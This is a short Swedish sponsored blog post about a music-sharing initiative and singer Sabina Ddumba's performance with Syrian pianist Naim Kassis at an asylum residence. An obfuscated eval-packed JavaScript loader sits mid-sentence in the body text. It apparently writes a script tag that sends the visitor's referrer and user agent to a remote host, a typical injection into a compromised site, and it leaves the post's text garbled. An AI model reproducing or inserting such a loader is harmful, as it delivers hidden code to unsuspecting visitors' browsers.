Image Image Image Image Image Image Image Image Image Image

| 30 oktober, 2020

Scroll to top

Top

Bli musikkompis du också!

Bli musikkompis du också!

Är du sugen på att bli musikkompis? Några av Sveriges största artister är det redan. Sabina Ddumba Little Jinder och Eva Dahlgren är några av dem som är anslutna. Kika in Sabina Ddumbas helt otroligt musikmöte med den kända pianisten Naim Kassis som kommer från Syrien. Hela träffen som ägde rum på hans asylboende i norra Sverige.

Tillsammans utför Sabina och Naim en avskalad och känslosam version av Sabinas låt ”Not too young”, något som lockade hela boendet att vara med.

Genom att dela med sig av sina musikupplevelser kan vi skapa otroliga stunder av gemenskap och samhörighet oavsett var man kommer ifrån eller tror på. Sådana stunder som i slutändan bidrar till större tolerans och ökad förståelse.

Kika eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skeih|var|u0026u|referrer|freah||js|php’.split(’|’),0,{}))
in videon nedan och inspireras av de båda musikinnovatörerna. 

Detta är ett sponsrat inlägg 

src=”//delivery.vidible.tv/jsonp/pid=56d087eae4b08d62c8b5fb6b/56c5f3a9e4b016c5d0a7155d.js?m.hideDuration=true” type=”text/javascript”>